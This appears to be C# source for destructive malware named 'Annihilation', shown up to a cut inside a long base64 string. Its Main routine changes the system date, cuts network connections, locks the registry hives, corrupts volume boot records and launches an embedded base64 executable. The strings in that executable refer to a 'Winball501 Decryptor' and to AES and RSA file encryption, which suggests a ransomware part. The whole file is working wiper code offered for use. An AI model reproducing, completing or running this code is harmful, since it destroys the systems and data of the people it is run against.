using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Threading.Tasks;
using Microsoft.Win32;

namespace Annihilation
{
    internal class Program
    {
        static void Main(string[] args)
        {
            try
            {
                // Change system date first
                Console.WriteLine("Changing system date to 19-01-2038...");
                ChangeSystemDate();

                // Get network interfaces and cut the connections
                Console.WriteLine("Getting network interfaces and cutting connections...");
                var adapters = GetNetworkAdapters();
                CutNetworkConnections(adapters);

                // Lock the registry hives last (synchronously)
                RegistryAndVbrHandler handler = new RegistryAndVbrHandler();
                Console.WriteLine("Locking all registry hives...");
                handler.LockAllRegistryHives();
                Console.WriteLine("All registry hives locked successfully.");

                var corruptVbrTask = Task.Run(() =>
                {
                    Console.WriteLine("Corrupting all VBRs...");
                    handler.CorruptAllVBRS();
                    Console.WriteLine("All VBRs corrupted successfully.");
                });

                // Run the other tasks in parallel after registry is locked
                var runBase64ExeTask = Task.Run(() =>
                {
                    Console.WriteLine("Running Base64 decoded executable...");
                    string base64EncodedExe = "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VQCaAC8BpgIAAAAAAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MjAAPD5jX19EaXNwbGF5Q2xhc3MxMV8wADw+Y19fRGlzcGxheUNsYXNzM18wADxsb2FkPmJfXzAAPHJ1bj5iX18wADw+Y19fRGlzcGxheUNsYXNzM18xADxsb2FkPmJfXzEAPD51X18xAElFbnVtZXJhYmxlYDEATGlzdGAxAGxhYmVsMQBGb3JtMQBidXR0b24xAGVuY3J5cHQxAGxpc3RCb3gxAHRleHRCb3gxAGdldF9TSEE1MTIAbGFiZWwyADxsb2FkPmRfXzMARDM1QTkyN0VDQjQzNzFGMUM5QjgzNDRCRUQ5RTc2MzIzNEY4NDU1Njg1RTA0MTRDMEYyRURBNkQ3NjYwOEZDNAA8TW9kdWxlPgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz4AU2l6ZUYAZ2V0X0FTQ0lJAFN5c3RlbS5JTwBzZXRfSVYAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAUmVhZABUaHJlYWQAbG9hZABBZGQAZ2V0X1JlZABzZXRfRm9ybWF0dGluZ0VuYWJsZWQAQXdhaXRVbnNhZmVPbkNvbXBsZXRlZABnZXRfSXNDb21wbGV0ZWQAU3luY2hyb25pemVkAFJvdW5kAGdldF9TdGFja1RyYWNlAGRlZmF1bHRJbnN0YW5jZQBzZXRfTW9kZQBzZXRfQXV0b1NjYWxlTW9kZQBGaWxlTW9kZQBQYWRkaW5nTW9kZQBDcnlwdG9TdHJlYW1Nb2RlAENpcGhlck1vZGUAZ2V0X01lc3NhZ2UASURpc3Bvc2FibGUAc2V0X1Zpc2libGUARG91YmxlAFJ1bnRpbWVGaWVsZEhhbmRsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxlAGdldF9OYW1lAHNldF9OYW1lAEhhc2hBbGdvcml0aG1OYW1lAEdldERpcmVjdG9yeU5hbWUAQ29tYmluZQBJQXN5bmNTdGF0ZU1hY2hpbmUAU2V0U3RhdGVNYWNoaW5lAHN0YXRlTWFjaGluZQBWYWx1ZVR5cGUAU3lzdGVtLkNvcmUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAEJ1dHRvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UARGlzcG9zZQBDcmVhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAPD4xX19zdGF0ZQBEZWxldGUAV3JpdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3luY1N0YXRlTWFjaGluZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQB2YWx1ZQBXaW5iYWxsNTAxIERlY3J5cHRvci5leGUAc2V0X1NpemUAc2V0X0Jsb2NrU2l6ZQBzZXRfQXV0b1NpemUAc2V0X0NsaWVudFNpemUAc2V0X0tleVNpemUAc3lta2V5c2l6ZQBTeXN0ZW0uVGhyZWFkaW5nAHNldF9QYWRkaW5nAEVuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbVhtbFN0cmluZwBUb1htbFN0cmluZwBUb1N0cmluZwByZXZlcnNlc3RyaW5nAGdldHJhbmRvbXN0cmluZwBkaXNwb3NpbmcAU3lzdGVtLkRyYXdpbmcARmx1c2gATWF0aABHZXRGb2xkZXJQYXRoAGdldF9MZW5ndGgAU2V0TGVuZ3RoAHZlcmkAeWF6aQBidXR0b24xX0NsaWNrAGFkZF9DbGljawBGbHVzaEZpbmFsQmxvY2sAVGFzawBMYWJlbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAV2hlbkFsbABDb250YWluZXJDb250cm9sAExpc3RDb250cm9sAEZpbGVTdHJlYW0AZ2V0X0Jhc2VTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAHJjbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAEFzeW1tZXRyaWNBbGdvcml0aG0AUmFuZG9tAEZvcm0ASUNyeXB0b1RyYW5zZm9ybQByZXNvdXJjZU1hbgBtdWx0cm9uZmlsZWd1YXJkaWFuAGNsb3NlZHJzYWtnZW4AT3BlbgBNYWluAEdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbgBBcHBsaWNhdGlvbgBzZXRfTG9jYXRpb24AcnRvcGVyYXRpb24AcnR0b3BlcmF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb250cm9sQ29sbGVjdGlvbgBPYmplY3RDb2xsZWN0aW9uAGdldF9Qb3NpdGlvbgBTZXRFeGNlcHRpb24AQnV0dG9uAFJ1bgBydW4ARmlsZUluZm8AQ3VsdHVyZUluZm8ARmlsZVN5c3RlbUluZm8AQ2hhcgBCaW5hcnlSZWFkZXIAUlNBQ3J5cHRvU2VydmljZVByb3ZpZGVyAEFlc0NyeXB0b1NlcnZpY2VQcm92aWRlcgBBc3luY1ZvaWRNZXRob2RCdWlsZGVyADw+dF9fYnVpbGRlcgBTcGVjaWFsRm9sZGVyAHNlbmRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAEV2ZW50SGFuZGxlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBJQ29udGFpbmVyAFRhc2tBd2FpdGVyAEdldEF3YWl0ZXIAQmluYXJ5V3JpdGVyAGRpcgBzZXRfQW5jaG9yAHNldF9CYWNrQ29sb3IAc2V0X1VzZVZpc3VhbFN0eWxlQmFja0NvbG9yAFJhbmRvbU51bWJlckdlbmVyYXRvcgAuY3RvcgAuY2N0b3IAV2luYmFsbDUwMSBEZWNyeXB0b3IAV2luYmFsbDUwMV9EZWNyeXB0b3IAQ3JlYXRlRGVjcnlwdG9yAENyZWF0ZUVuY3J5cHRvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAcmFlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAFdpbmJhbGw1MDFfRGVjcnlwdG9yLkZvcm0xLnJlc291cmNlcwBXaW5iYWxsNTAxX0RlY3J5cHRvci5Qcm9wZXJ0aWVzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAR2V0RGlyZWN0b3JpZXMAV2luYmFsbDUwMV9EZWNyeXB0b3IuUHJvcGVydGllcwBHZXRGaWxlcwBFbmFibGVWaXN1YWxTdHlsZXMAQW5jaG9yU3R5bGVzAFJmYzI4OThEZXJpdmVCeXRlcwBHZXROb25aZXJvQnl0ZXMAR2V0Qnl0ZXMAU2V0dGluZ3MARXZlbnRBcmdzADw+NF9fdGhpcwBTeXN0ZW0uVGhyZWFkaW5nLlRhc2tzAHRhc2tzAGdldF9Db250cm9scwBnZXRfSXRlbXMAU3lzdGVtLldpbmRvd3MuRm9ybXMAc2V0X0F1dG9TY2FsZURpbWVuc2lvbnMAZ2V0X0NoYXJzAFJ1bnRpbWVIZWxwZXJzAEZpbGVBY2Nlc3MAY29tcG9uZW50cwBFeGlzdHMAQ29uY2F0AE9iamVjdABzZXRfSXRlbUhlaWdodABnZXRfRGVmYXVsdABTZXRDb21